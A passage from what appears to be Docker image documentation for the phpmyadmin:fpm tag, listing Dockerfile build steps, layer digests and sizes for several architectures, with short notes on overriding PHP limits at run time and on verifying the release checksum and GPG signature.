# Thu, 01 Apr 2021 08:18:11 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 08:18:12 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Thu, 01 Apr 2021 08:18:12 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Thu, 01 Apr 2021 08:18:12 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Thu, 01 Apr 2021 08:18:12 GMT
CMD ["php-fpm"]
```
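
The `MAX_EXECUTION_TIME`, `MEMORY_LIMIT`, and `UPLOAD_LIMIT` defaults baked in above are read back through `${...}` references in the generated `phpmyadmin-misc.ini`, so they can be overridden per container without rebuilding the image. A minimal sketch follows; the values are examples only, and `PMA_HOST` comes from the image's README rather than from the Dockerfile shown here, so treat it as an assumption. Since this `fpm` variant runs only `php-fpm` on port 9000, a separate web server (for example nginx with `fastcgi_pass` pointed at that port and the `/var/www/html` document root) has to sit in front of it:

```console
$ # override the baked-in PHP limits at run time (example values)
$ docker run -d --name phpmyadmin-fpm \
>     -e PMA_HOST=db \
>     -e MEMORY_LIMIT=1G \
>     -e UPLOAD_LIMIT=64M \
>     phpmyadmin:fpm
```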
- Layers:
- `sha256:75646c2fb4101d306585c9b106be1dfa7d82720baabe1c75b64d759ea8adf341`
Last Modified: Tue, 30 Mar 2021 21:54:15 GMT
Size: 27.1 MB (27139293 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:854fb08fe05067d46212fe0b4eef9b8904ba306bcd8b189884684e157639b00d`
Last Modified: Wed, 31 Mar 2021 11:22:07 GMT
Size: 227.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d099f6707d86ef1d69cb731a4162989a7a90160ef73c7f1fc4ec8e4fb6cf6999`
Last Modified: Wed, 31 Mar 2021 11:22:20 GMT
Size: 76.7 MB (76679701 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:038e5b09075278999e42de226a764ed2ffffc1467e95126feba28817c6b61596`
Last Modified: Wed, 31 Mar 2021 11:22:06 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0c625a0ff934dfe39befa65f46404907efbf7aabfc520db14d68aaa63e9c1e62`
Last Modified: Wed, 31 Mar 2021 11:26:58 GMT
Size: 10.7 MB (10656366 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d4c2dd1e32d1154ee1562e07b78ee0d11fd20bfaf5cb0e7f3a5922f84d2f233f`
Last Modified: Wed, 31 Mar 2021 11:26:52 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8e85fbcce44f903742183092282ccfd0adc847d34c614fc912162a05c1653f7e`
Last Modified: Wed, 31 Mar 2021 11:26:58 GMT
Size: 28.6 MB (28572511 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9675c8079d855f4115de7c1ebc348a335e096c44060b7997e8f5e9b0abddbee0`
Last Modified: Wed, 31 Mar 2021 11:26:52 GMT
Size: 2.3 KB (2268 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:5979fdf4722eeeda3e8df3222d9a10f8e3ccd1114f301fdbce11bb73afb520cf`
Last Modified: Wed, 31 Mar 2021 11:26:51 GMT
Size: 245.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:4752052969ccd1b79e0c07262d3b2b33c5475041e0cd01552464be61f7804682`
Last Modified: Wed, 31 Mar 2021 11:26:52 GMT
Size: 8.4 KB (8448 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ed19fd467594aefbdf8191269110131c5d963783c74f479d879a045d6e94ecfe`
Last Modified: Thu, 01 Apr 2021 08:19:37 GMT
Size: 2.9 MB (2876563 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8a317cfc71fb9a0ff28840a370bf04a6ca6f1241cedeb4994952d169c0efac3b`
Last Modified: Thu, 01 Apr 2021 08:19:36 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a22465270704e732fc7ca4ccc7bdef66994686126b6156c2459ba77ac5a3c493`
Last Modified: Thu, 01 Apr 2021 08:19:41 GMT
Size: 14.1 MB (14065750 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:5c2bf9a38799910deb42cf5e6e3c4dae3bee8700c46543ee3d68480a46f922bb`
Last Modified: Thu, 01 Apr 2021 08:19:39 GMT
Size: 1.5 KB (1526 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:421376565007020697324ea3c0b1cd71bddb95056e37e4c1e11ba4de09db11ea`
Last Modified: Thu, 01 Apr 2021 08:19:36 GMT
Size: 771.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; arm variant v5
```console
$ docker pull phpmyadmin@sha256:6bfced099f1ee5aeddc9f06fa383458ad213563914662f97a380792ec2a5b19b
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **138.3 MB (138264366 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:a198f768171043610942c73abc37d1d44efa64002e82f8759be80c7d061d412a`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:51:08 GMT
ADD file:779165b34b3be18f6c24e448997bf6497e3b27ff72954fe3cdced0ebcc77b6b8 in /
# Tue, 30 Mar 2021 21:51:11 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 00:16:02 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 00:16:03 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 00:16:48 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 00:16:52 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 00:16:55 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 00:27:07 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 00:27:08 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:27:08 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:27:09 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 00:43:17 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 00:43:20 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 00:43:22 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 00:43:23 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 00:43:51 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 00:43:52 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 00:47:26 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 00:47:29 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 00:47:34 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 00:47:34 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 00:47:35 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 00:47:39 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 00:47:39 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 00:47:41 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 00:47:42 GMT
CMD ["php-fpm"]
# Wed, 31 Mar 2021 13:30:17 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 13:30:19 GMT
ENV MAX_EXECUTION_TIME=600
# Wed, 31 Mar 2021 13:30:20 GMT
ENV MEMORY_LIMIT=512M
# Wed, 31 Mar 2021 13:30:22 GMT
ENV UPLOAD_LIMIT=2048K
# Wed, 31 Mar 2021 13:30:30 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Wed, 31 Mar 2021 13:30:32 GMT
ENV VERSION=5.1.0
# Wed, 31 Mar 2021 13:30:34 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Wed, 31 Mar 2021 13:30:36 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Wed, 31 Mar 2021 13:30:37 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Wed, 31 Mar 2021 13:31:23 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 13:31:28 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Wed, 31 Mar 2021 13:31:30 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Wed, 31 Mar 2021 13:31:33 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Wed, 31 Mar 2021 13:31:35 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:7cbaf854daf876ddd338771dec41777b0dfcad33c1fc8ea3512a0708333e4465`
Last Modified: Tue, 30 Mar 2021 21:58:44 GMT
Size: 24.9 MB (24873214 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ae61257e71ed1fe36dd059766677f4a537b356c6fc540a3ca4ba7402f6f3d590`
Last Modified: Wed, 31 Mar 2021 01:29:10 GMT
Size: 229.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:fe994f5a2a99df2b5e9f78688bf4a0a7da6f65bbcc6a46c31e2b096ce25c012f`
Last Modified: Wed, 31 Mar 2021 01:29:35 GMT
Size: 58.8 MB (58815883 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f9eca09f3156e497ec384a401521d8dc49d572b779a60298cad4e6929d8f38aa`
Last Modified: Wed, 31 Mar 2021 01:29:09 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ae14a1275893a59e7c939e187ba5251a2f645c52fc63074a2ef486002c8c736c`
Last Modified: Wed, 31 Mar 2021 01:32:51 GMT
Size: 10.7 MB (10654223 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:35d334dd8c3e1c92dcf4198b6570cf0ddaea7eaf51f2ea32a10a7dbb2d3f5f05`
Last Modified: Wed, 31 Mar 2021 01:32:48 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:21302b092336380600c583be699fc5a9dc1e2394996c4f8b686da98e45b8641d`
Last Modified: Wed, 31 Mar 2021 01:32:53 GMT
Size: 27.2 MB (27187426 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e0e21d115b26c09e8a8782dee678ac97cef1711ae2156ec32ad3b5a158d576fa`
Last Modified: Wed, 31 Mar 2021 01:32:51 GMT
Size: 2.3 KB (2269 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e559a0ab2f5c4cec184d81595e369c8b46da69d13f16b36d11c4cff4a3e6128f`
Last Modified: Wed, 31 Mar 2021 01:32:49 GMT
Size: 247.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f9a8f566e5a87f2b0a9b54c103b867f3b1af600e741414b5448505e6a17d56c7`
Last Modified: Wed, 31 Mar 2021 01:32:51 GMT
Size: 8.4 KB (8446 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:72b8f1e0094a1efac98cdaed316ddb2abd67c480366662c0d7b9966cf44ada47`
Last Modified: Wed, 31 Mar 2021 13:32:26 GMT
Size: 2.7 MB (2654704 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ec1efcef1f400b07b380413d700441c4eef2bdecfa8ea7e24278caee5dd44e4e`
Last Modified: Wed, 31 Mar 2021 13:32:25 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:18fbcd4bcdfaa2689ceac4e0b4eb123887b547869072163f3b4e4f5f304a6b06`
Last Modified: Wed, 31 Mar 2021 13:32:32 GMT
Size: 14.1 MB (14064121 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:081f179063c24fc75f71a60b547cf86f8947d4edc4fca64f3d96a971cfa10b9d`
Last Modified: Wed, 31 Mar 2021 13:32:25 GMT
Size: 1.5 KB (1525 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f2ec8ba4e2867767d9496f05c535a3dc99c3ae49d57dc0e147ba885a5ba0cf61`
Last Modified: Wed, 31 Mar 2021 13:32:25 GMT
Size: 771.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
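
Each variant's Dockerfile above fetches the phpMyAdmin release and checks both the pinned SHA-256 and a detached GPG signature before unpacking it. The same verification works outside a build; here is a minimal sketch reusing the URL, checksum, and key ID recorded above (depending on your GnuPG configuration, a keyserver may need to be passed explicitly, as the Dockerfile does):

```console
$ curl -fsSL -o phpMyAdmin.tar.xz https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
$ curl -fsSL -o phpMyAdmin.tar.xz.asc https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz.asc
$ echo "aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68 *phpMyAdmin.tar.xz" | sha256sum -c -
$ gpg --batch --recv-keys 3D06A59ECE730EB71B511C17CE752F178259BD92
$ gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz
```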
### `phpmyadmin:fpm` - linux; arm variant v7
```console
$ docker pull phpmyadmin@sha256:220f0bcadfdbda5fba92813aba91dfc82698b81a38cab4ec37c4342fbc061c6e
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **135.7 MB (135683018 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:01a590f2a90ad713440a4296c22fb297abd29f86da25a1fdecf559e595f51d41`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 23:08:38 GMT
ADD file:c1eeb99fc8ec483e175d4948a58d7f7b246b0d6b887f435a5fef07ef43699f76 in /
# Tue, 30 Mar 2021 23:08:41 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 07:22:05 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 07:22:06 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 07:22:47 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 07:22:51 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 07:22:55 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 07:32:37 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 07:32:38 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 07:32:40 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 07:32:41 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 07:48:40 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 07:48:41 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 07:48:42 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 07:48:44 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 07:49:04 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 07:49:05 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 07:52:06 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | 